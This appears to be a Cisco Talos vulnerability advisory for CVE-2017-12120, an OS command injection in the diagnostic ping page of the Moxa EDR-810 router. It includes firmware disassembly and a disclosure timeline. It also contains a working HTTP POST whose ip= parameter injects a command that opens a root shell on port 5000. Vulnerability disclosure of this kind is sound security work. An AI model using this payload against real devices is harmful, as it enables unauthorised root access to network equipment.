CVE-2017-12120
An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the “/goform/net_WebPingGetValue” URI to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
https://www.moxa.com/product/EDR-810.htm
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Once logged in to the device’s web interface, a diagnostic ping page can be found. This page asks the user for an IP address to ping. There is input validation client-side, but it can be easily bypassed by using tools, such as cURL or Wget. There is no server-side validation of input. The page will call the system to run the Linux ping command. The system will run the following command with ‘%s’ as user-controlled input.
echo "$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)" > /mnt/ramdisk/MagicPingResult
The code below shows user input being passed to system.
R0, =aRmFMntRamdiskM ; "rm -f /mnt/ramdisk/MagicPingResult"
.text:0003C7D8 BL system
.text:0003C7DC LDR R2, =aEchoPingC4SQW3 ; "echo "$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)" > /mnt/ramdisk/MagicPingResult"
.text:0003C7E0 SUB R1, R11, #-command
.text:0003C7E4 SUB R3, R11, #-dest
.text:0003C7E8 MOV R0, R1 ; s
.text:0003C7EC MOV R1, R2 ; format
.text:0003C7F0 MOV R2, R3
.text:0003C7F4 BL sprintf
.text:0003C7F8 SUB R3, R11, #-command
.text:0003C7FC MOV R0, R3 ; command
.text:0003C800 BL system # call to system
Vulnerable URI: /goform/net_WebPingGetValue Vulnerable Parameter: ip=
The following POST will start a root shell on port 5000.
POST: /goform/net_WebPingGetValue HTTP/1.1
Host: DeviceIP
Cooke: Valid-Cookie
Content-Type: japplication/x-www-form-urlencoded
pingTemp=127.0.0.1&ifs=1&ip=`tcpsvd 0 5000 /bin/bash`#
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Carlos Pacho of Cisco Talos.